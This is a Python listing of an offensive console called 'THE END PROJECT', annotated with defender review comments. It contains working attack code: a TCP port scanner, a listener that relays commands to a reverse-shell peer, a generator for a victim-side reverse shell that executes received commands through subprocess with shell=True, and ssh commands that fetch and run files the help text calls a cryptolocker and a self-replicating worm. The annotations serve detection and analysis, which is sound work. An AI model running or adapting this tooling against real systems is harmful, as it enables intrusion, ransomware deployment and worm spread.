# Review summary (defender's reading of this listing)
#
# What the listing is: an interactive operator console. Its own help text lists
# remote commands run over ssh (including fetching and running files it calls a
# cryptolocker, a decryptor and a self-replicating worm), a TCP connect scan, a
# TCP listener that relays typed commands to a connected peer, and a generator
# for the peer-side script. crypto.py, decrypt.py and downdd.py are NOT part of
# this listing.
#
# Observable artefacts that appear literally in the code below:
#   - scan: TCP connects to ports 1..999 of one host, each followed by b'Hello\n'
#   - peer greeting sent on connect: b'Shell connected : '
#   - staging path on the operator host: /var/www/html/tools/ (rm_shell.py is written there)
#   - retrieval pattern on the target: `wget http://<ip>/tools/<name>` followed by
#     `python3 <name>` or `bash <name>`
#   - a hard-coded Fernet key (see the VARIABLES section)
#
# NOTE(review): the listing was whitespace-collapsed. Statement nesting below is
# reconstructed from syntax and should be confirmed against the original file.
# Triple-quoted literals are kept exactly as they appear in the listing (on one
# line); their original line breaks are not recoverable from here.

import textwrap
tep = textwrap.dedent("""\ ####################################################################################### ############################# THE END PROJECT V.0.5.1 ############################# ####################################################################################### by ben4444 # # # Objectif : # # - Scan ports/vuln # # - Teste vuln # # - Exploit # # - Persistances # # - Scripting automatisé de Scan ports/vuln Test Exploit + Persistance # # - Faire le café ! # # # # A faire : # # - script best tools (msf/nmap/smbap ...) # # # ####################################################################################### Tape "help" pour connaitre la liste des commandes ! """)

#######################################################################################
#################################### MODULES ######################################
#######################################################################################
# NOTE(review): cmd, BLANKLINE_MARKER, path, random, modules, stdout and glob are not
# referenced anywhere in the visible listing; subprocess is only named inside the
# generated script text, not called by this module. socket is imported twice.
import cmd
from doctest import BLANKLINE_MARKER
from importlib.resources import path
from random import random
from cryptography.fernet import Fernet
from sys import modules, stdout, exit
from time import time
import os
import glob
import socket
import subprocess
import socket
# This later import rebinds `time` from the function imported above to the module;
# get_scan() relies on that when it calls time.process_time().
import time
from termcolor import colored as color

#######################################################################################
#################################### FUNCTIONS ####################################
#######################################################################################

# File push function
def push(exploit_path,user,rhost,chemin):
    """Copy a local file to a remote path by running `scp` through os.system.

    All four values are interpolated into the shell command line unquoted, so
    any shell metacharacter in them is interpreted by the local shell.
    Ctrl-C is swallowed; the function always returns None.
    Not called anywhere in the visible listing.
    """
    try :
        os.system("scp {} {}@{}:{}".format(exploit_path,user,rhost,chemin))
    except KeyboardInterrupt:
        print("")
        pass

# push cmd on RHOST :
def drop_cmd(user,rhost,command):
    """Run `command` on `rhost` as `user` by invoking the local `ssh` client.

    The command line is built with str.format and handed to os.system, so the
    values pass through the local shell unquoted before ssh sees them.
    The exit status of os.system is discarded; Ctrl-C is swallowed.
    """
    try :
        os.system("ssh {}@{} {}".format(user,rhost,command))
    except KeyboardInterrupt:
        print("")
        pass

# Scan function
def get_scan(rhost):
    """Attempt a full TCP connection to ports 1..999 of `rhost`, one at a time.

    Each successful connection sends b'Hello\\n' and reads up to 1024 bytes.
    From the network side this is a sequential connect scan with a fixed
    probe payload. Any exception on a port (refused, timeout, short reply)
    is swallowed by the bare except and the loop moves to the next port.
    """
    try :
        # process_time() is CPU time of this process, not wall-clock time.
        start = time.process_time()
        for p in range(1,1000):
            try :
                s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                s.connect((rhost, p))
                s.send(b'Hello\n')
                data = s.recv(1024)
                s.close()
                # NOTE(review): connect_ex() is called on the socket that was closed on
                # the previous line; presumably 9 is the error number reported for the
                # closed descriptor -- confirm.
                result = s.connect_ex((rhost, p))
                if result == 9:
                    # data[10] is a single byte of the reply (an int), not a protocol name.
                    log3 = "[LOG 3] - Le port {} est ouver sur l'adresse ip : {} !\nCe port correspond au protocol {}".format(p, rhost, data[10])
                    print(color(log3,'yellow'))
            except :
                continue
        end = time.process_time()
        final_time = (end - start)
        log4 = "[LOG 4] - le temps d'execution du scan est de {} secondes".format(final_time)
        print(color(log4,'yellow'))
    except KeyboardInterrupt:
        print("")
        pass

# Handler function + reverse shell
def handler(lhost,lport,command):
    """Listen on (lhost, lport), accept one TCP peer and relay typed commands to it.

    Prints the peer address and the first 2048 bytes it sends, then loops:
    read a line from the operator, send it, print up to 2048 bytes of reply.
    The loop ends when the operator types "exit" (which is also sent).
    Traffic is plain TCP with no authentication of the peer.
    """
    try :
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((lhost, lport))
        s.listen(2)
        conn, addr = s.accept()
        log = "[LOG 2] - New connection from : {}".format(addr[0])
        print(color(log,'yellow'))
        data = conn.recv(2048)
        print(data.decode())
        # reverse shell command send
        while command != "exit" :
            command = input("remote shell # ")
            # NOTE(review): nesting of the send/recv/print under this `if` is
            # reconstructed -- confirm against the original file.
            if command != "" :
                conn.send(command.encode())
                data = conn.recv(2048)
                print(data.decode())
        # `s.close` / `conn.close` are attribute references without a call,
        # so neither socket is actually closed here or in the handlers below.
        s.close
        conn.close
    except KeyboardInterrupt:
        # If the interrupt arrives before accept() returns, `conn` is unbound here.
        s.close
        conn.close
        print("")
        pass
    except :
        s.close
        conn.close
        print("error")
        pass

# Handler function that has the peer download a script and execute it
def auto_handler(lhost,lport,ip_kali,tools):
    """Accept one TCP peer and send it a fixed two-command sequence.

    The sequence is `wget http://<ip_kali>/tools/<tools>` followed by
    `python3 <tools>` or `bash <tools>`, chosen by the last character of
    `tools`. Each command is printed locally, sent, and up to 2048 bytes of
    reply are printed. On the target this shows up as wget over plain HTTP
    immediately followed by an interpreter run on the fetched file name.
    """
    try :
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.bind((lhost, lport))
        s.listen(2)
        conn, addr = s.accept()
        log = "[LOG 2] - New connection from : {}".format(addr[0])
        print(color(log,'yellow'))
        data = conn.recv(2048)
        print(data.decode())
        # set command action
        # command_list is the list of commands to run: it downloads a script and executes it
        # edit the pwnd.bash script to perform the desired actions
        url = "http://{}/tools/{}".format(ip_kali,tools)
        if tools[-1] == "y": # if the malware is a Python script
            command_list = ["wget {}".format(url),"python3 {}".format(tools)]
        if tools[-1] == "h": # if the malware is a bash script
            command_list = ["wget {}".format(url),"bash {}".format(tools)]
        # If `tools` ends in neither "y" nor "h", command_list is never bound; the
        # resulting error is caught by the bare except below, which prints "error".
        for command in command_list :
            print(command)
            conn.send(command.encode())
            data = conn.recv(2048)
            print(data.decode())
        # Attribute references only; the sockets are not closed.
        s.close
        conn.close
    except KeyboardInterrupt:
        s.close
        conn.close
        print("")
        pass
    except :
        s.close
        conn.close
        print("error")
        pass

# victim-side reverse shell code
def get_reverse(rhost,rport):
    """Return the text of the peer-side script with an address and port filled in.

    `rhost` and `rport` are substituted into the two `{}` placeholders of the
    connect call inside the template. Per the template text, the generated
    script connects out, sends b'Shell connected : ', and passes whatever it
    receives to subprocess.Popen(..., shell=True). The fixed greeting and a
    Python process spawning shell children from a socket-driven loop are the
    visible detection points.
    The template is kept exactly as it appears in this listing (one line).
    """
    reverse_code = textwrap.dedent("""\ # Code Victime du reverse shell import socket import subprocess s=socket.socket(socket.AF_INET, socket.SOCK_STREAM) while True : try : #@ip kali et port handler i = s.connect(('{}', {})) s.send(b'Shell connected : ') command = "." while command != "exit": if command != "" : data = s.recv(2048) command = data.decode() #reverse shell process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE) out = process.stdout.read() + process.stderr.read() s.send(out) s.close() except : continue """.format(rhost,rport))
    return reverse_code

# variable = input() helper functions, with a colored prompt.
# Each helper returns the raw string typed by the operator, with no validation,
# and returns None if the prompt is interrupted with Ctrl-C.
def set_rhost():
    """Prompt for the remote host and return the typed string."""
    try :
        rhost = input(color("Set rhost : ",'blue'))
        return rhost
    except KeyboardInterrupt:
        print("")
        pass

def set_rport():
    """Prompt for the remote port and return it as a string."""
    try :
        rport = input(color("Set rport : ",'blue'))
        return rport
    except KeyboardInterrupt:
        print("")
        pass

def set_lhost():
    """Prompt for the local listening address and return the typed string."""
    try :
        lhost = input(color("Set lhost : ",'blue'))
        return lhost
    except KeyboardInterrupt:
        print("")
        pass

def set_lport():
    """Prompt for the local listening port and return it as a string."""
    try :
        lport = input(color("Set lport : ",'blue'))
        return lport
    except KeyboardInterrupt:
        print("")
        pass

def set_command():
    """Prompt for a command line and return the typed string."""
    try :
        command = input(color("Set command : ",'blue'))
        return command
    except KeyboardInterrupt:
        print("")
        pass

def set_user():
    """Prompt for the remote user name and return the typed string."""
    try :
        user = input(color("Set user : ",'blue'))
        return user
    except KeyboardInterrupt:
        print("")
        pass

def set_ask():
    """Ask whether to listen on the default 0.0.0.0 and return the raw answer."""
    try :
        ask = input(color("Set listenner ip :\ndefault = 0.0.0.0 ? Y/n : ",'blue'))
        return ask
    except KeyboardInterrupt:
        print("")
        pass

def set_tools():
    """Prompt for a file name under the tools directory and return it."""
    try :
        tools = input(color("Set tools name : ",'blue'))
        return tools
    except KeyboardInterrupt:
        print("")
        pass

def set_ipkali():
    """Prompt for the address of the host serving /tools/ and return it."""
    try :
        ip_kali = input(color("Set @ip kali : ",'blue'))
        return ip_kali
    except KeyboardInterrupt:
        print("")
        pass

# console
def set_i():
    """Show the main "shell # " prompt and return the typed command string."""
    try :
        i = input(color(color("shell # ",'green')))
        return i
    except KeyboardInterrupt:
        print("")
        pass

# Kali IP URL function
def get_url(ip_kali,tools):
    """Return "http://<ip_kali>/tools/<tools>" (plain HTTP, no integrity check)."""
    try :
        url = "http://" + ip_kali + "/tools/{}".format(tools)
        return url
    except KeyboardInterrupt:
        print("")
        pass

#######################################################################################
#################################### VARIABLES ####################################
#######################################################################################

# var
# Hard-coded symmetric key. It is not referenced again in the visible listing;
# presumably it is shared with crypto.py / decrypt.py -- confirm. A key embedded in
# source is recoverable by anyone holding the file and is usable as an indicator.
key = Fernet(b'jY-kUBkRn0DTi4BDHqcNJcke_GvHqa6OyZzPw6TFnh8=')
# Package names sent as `pip install <name>` by the "pip install" console command.
module = ["cryptography"]
# msg print color | [LOG] - yellow | [ERROR] - red
start_handler = color("[LOG 1] - Start Handler ...","yellow")
#log2 = msg return def handler
#log3 = msg return get scan
#log4 = msg return get scan time
log5 = color("[LOG 5] - Reverse Shell Created in /var/www/html/tools","yellow")
log6 = color("[LOG 6] - Reverse Shell Create : rhost/rport on targets = ip/port kali","yellow")
err1 = color("[ERROR 1] - No port set","red")
#err2 = color("[ERROR","red")
#err3 = color("[ERROR","red")
#err4 = color("[ERROR","red")
#err5 = color("[ERROR","red")
cmd_help = textwrap.dedent("""\ HELP - THE END ! command remote : - ssh command - execute une comamnde via ssh - ssh shell - execute /bin/bash a distance, donne un shell minimaliste ssh - pip install - install les modules du code via ssh - install python - install python via ssh (root required) - rm crypto - telecharge et execute un cryptolocker via ssh - rm decrypt - telecharge et execute le decrypt via ssh - rm downdd - telecharge et execute un vers autorepliquant a l'infini via ssh command local : - help - affiche le message d'aide pour commande - set ip kali / rhost / lhost / rport / lport - variables remote access - show options - montre les variables remote si dessus - scan - scan port victime ou réseau - reverse create - creation d'un reverse shell a executer sur la machine cible - shell - execute /bin/bash: - handler - met en ecoute l'ip et le port choisis et recupere un reverse shell - instant pwnd - recupere un reverse shell et push un script qui s'execute - coffee - make a coffee - edit tools - editer des fichier sur le apache local """)
coffee = textwrap.dedent("""\ I'm a teepot but, i can make a coffee for you ! } { { { } } _..,}-{-,{._ .-;'-.,____,.-'; (( | | `)) ; ` \ / .-' `,.____.,' '-. ( '------' ) `-=..________..--' """)

#######################################################################################
####################################### CODE ######################################
#######################################################################################

# main terminal function
def get_code():
    """Run the interactive console until the operator types "exit".

    Each iteration reads one line with set_i() and dispatches on an exact
    string match. Connection settings (user, rhost, lhost, rport, lport,
    ip_kali) live in local variables for the lifetime of the loop. When
    set_i() returns None after Ctrl-C, no branch matches and the loop
    prompts again. Unknown commands are ignored silently.
    """
    i = ""
    user = ""
    rhost = ""
    lhost = ""
    rport = ""
    lport = ""
    ip_kali = ""
    while i != "exit" :
        i = set_i()
        if i == "help" :
            print(color(cmd_help,'green'))
        elif i == "set ip kali":
            ip_kali = set_ipkali() ; print("ip kali = {}".format(ip_kali))
        elif i == "set rhost" :
            rhost = set_rhost() ; print("rhost = {}".format(rhost))
        elif i == "set lhost":
            lhost = set_lhost() ; print("lhost = {}".format(lhost))
        elif i == "set rport":
            rport = set_rport() ; print("rport = {}".format(rport))
        elif i == "set lport":
            lport = set_lport() ; print("lport = {}".format(lport))
        elif i == "set user":
            user = set_user() ; print("user = {}".format(user))
        elif i == "show options":
            print("ip kali = {}".format(ip_kali)) ; print("rhost = {}".format(rhost)) ; print("lhost = {}".format(lhost)) ; print("rport = {}".format(rport)) ;print("lport = {}".format(lport)) ; print("user = {}".format(user))
        elif i == "coffee" :
            print(color(coffee, 'red'))
        elif i == "edit tools":
            # The typed file name is interpolated into a shell command line unquoted.
            tools = set_tools() ; os.system("nano /var/www/html/tools/{}".format(tools))
        elif i == "clear":
            os.system("clear") ; print(color(tep,'green'))
        elif i == "exit" :
            exit()
        elif i == "scan" :
            if rhost != "":
                get_scan(rhost)
            else :
                print("error : no rhost or network set") ; rhost = set_rhost() ; get_scan(rhost)
        elif i == "ssh command" :
            if rhost == "":
                rhost = set_rhost()
            if user == "":
                user = set_user()
            command = set_command()
            drop_cmd(user,rhost,command)
        elif i == "pip install" :
            if rhost == "":
                rhost = set_rhost()
            if user == "":
                user = set_user()
            # for each module the code needs, send a `pip install <module>` command over ssh
            for item in module :
                command = "pip install {}".format(item)
                drop_cmd(user,rhost,command)
        elif i == "install python" :
            if rhost == "":
                rhost = set_rhost()
            if user == "":
                user = set_user()
            command = "apt install python"
            drop_cmd(user,rhost,command)
        elif i == "ssh shell":
            if rhost == "":
                rhost = set_rhost()
            if user == "":
                user = set_user()
            command = "/bin/bash"
            print("Shell start :")
            drop_cmd(user,rhost,command)
        elif i == "shell":
            os.system("/bin/bash")
        elif i == "reverse create" :
            # Per log6, rhost/rport here are the address and port the generated
            # script connects back to, i.e. the listener, not the target.
            print(log6)
            rhost = set_rhost()
            rport = set_rport()
            reverse = get_reverse(rhost,rport)
            # Written into the local web root, where get_url()-style URLs serve it.
            with open("/var/www/html/tools/rm_shell.py" , "w") as rv :
                rv.write(reverse)
            print(log5)
        elif i == "rm crypto" :
            # The help text describes crypto.py as a cryptolocker; the file itself is
            # not in this listing. On the target this is an ssh session running
            # `wget http://<ip>/tools/crypto.py` and then `python3 crypto.py`.
            if rhost == "":
                rhost = set_rhost()
            if user == "" :
                user = set_user()
            if ip_kali == "" :
                ip_kali = set_ipkali()
            tools = "crypto.py"
            url_crypto = get_url(ip_kali,tools)
            command = 'wget {}'.format(url_crypto)
            drop_cmd(user,rhost,command)
            command = 'python3 crypto.py'
            drop_cmd(user,rhost,command)
        elif i == "rm decrypt" :
            # Same fetch-then-run sequence for decrypt.py (not in this listing).
            if rhost == "":
                rhost = set_rhost()
            if user == "" :
                user = set_user()
            if ip_kali == "" :
                ip_kali = set_ipkali()
            tools = "decrypt.py"
            url_decrypt = get_url(ip_kali,tools)
            command = 'wget {}'.format(url_decrypt)
            drop_cmd(user,rhost,command)
            command = 'python3 decrypt.py'
            drop_cmd(user,rhost,command)
        elif i == "rm downdd":
            # Same fetch-then-run sequence for downdd.py, which the help text
            # describes as a self-replicating worm (not in this listing).
            if rhost == "":
                rhost = set_rhost()
            if user == "" :
                user = set_user()
            if ip_kali == "" :
                ip_kali = set_ipkali()
            tools = "downdd.py"
            url_downdd = get_url(ip_kali,tools)
            command = 'wget {}'.format(url_downdd)
            drop_cmd(user,rhost,command)
            command = 'python3 downdd.py'
            drop_cmd(user,rhost,command)
        elif i == "handler" :
            ask = set_ask()
            # Default answer binds the listener on every local interface.
            if ask == "y" or ask == "Y" or ask == "" :
                lhost = "0.0.0.0"
            else :
                lhost = set_lhost()
            if lport == "" :
                lport = set_lport()
            command = "."
            print(start_handler)
            # int(lport) raises on a non-numeric or None value; nothing here catches it.
            handler(lhost,int(lport),command)
        elif i == "instant pwnd" :
            if ip_kali == "" :
                ip_kali = set_ipkali()
            ask = set_ask()
            if ask == "y" or ask == "Y" or ask == "" :
                lhost = "0.0.0.0"
            else :
                lhost = set_lhost()
            if lport == "" :
                lport = set_lport()
            tools = set_tools()
            print(start_handler)
            auto_handler(lhost,int(lport),ip_kali,tools)

# code
# Module-level entry: clears the terminal, prints the banner and starts the console
# as soon as the file is executed or imported (there is no __main__ guard).
os.system("clear")
print(color(tep,'green'))
get_code()